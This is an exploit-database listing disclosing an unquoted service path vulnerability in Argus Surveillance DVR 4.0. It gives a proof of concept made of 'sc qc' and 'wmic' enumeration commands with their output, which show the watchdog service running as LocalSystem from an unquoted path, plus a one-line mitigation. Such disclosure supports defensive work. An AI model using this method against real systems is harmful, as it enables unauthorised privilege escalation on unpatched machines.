Argus Surveillance DVR 4.0 - Unquoted Service Path

vendor:

Argus Surveillance DVR 4.0

by:

Salman Asad (LeoBreaker)

7,8

CVSS

HIGH

Unquoted Service Path

CWE

Product Name: Argus Surveillance DVR 4.0

Affected Version From: Argus Surveillance DVR 4.0

Affected Version To: Argus Surveillance DVR 4.0

Patch Exists: NO

Related CWE: N/A

CPE: a:argus_surveillance_dvr:argus_surveillance_dvr_4.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 10

2021

Argus Surveillance DVR 4.0 – Unquoted Service Path

Argus Surveillance DVR 4.0 is vulnerable to Unquoted Service Path vulnerability. This vulnerability can be exploited by an attacker to gain elevated privileges on the system. The attacker can use the 'sc qc' command to query the service configuration and the 'wmic service get' command to get the service name, display name, path name and start mode. If the service is configured to start automatically and the path is not quoted, the attacker can gain elevated privileges on the system.

Mitigation:

Ensure that all services have their paths quoted.

Source

Exploit-DB raw data:

# Exploit Title: Argus Surveillance DVR 4.0 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 03.09.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 10

# Note: "Start as service on Windows Startup" must be enabled in Program Options

# Proof of Concept:

C:\Users\death>sc qc ARGUSSURVEILLANCEDVR_WATCHDOG
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ARGUSSURVEILLANCEDVR_WATCHDOG
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Argus Surveillance DVR Watchdog
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Argus Surveillance DVR Watchdog         ARGUSSURVEILLANCEDVR_WATCHDOG           C:\Program Files\Argus Surveillance DVR\DVRWatchdog.exe         Auto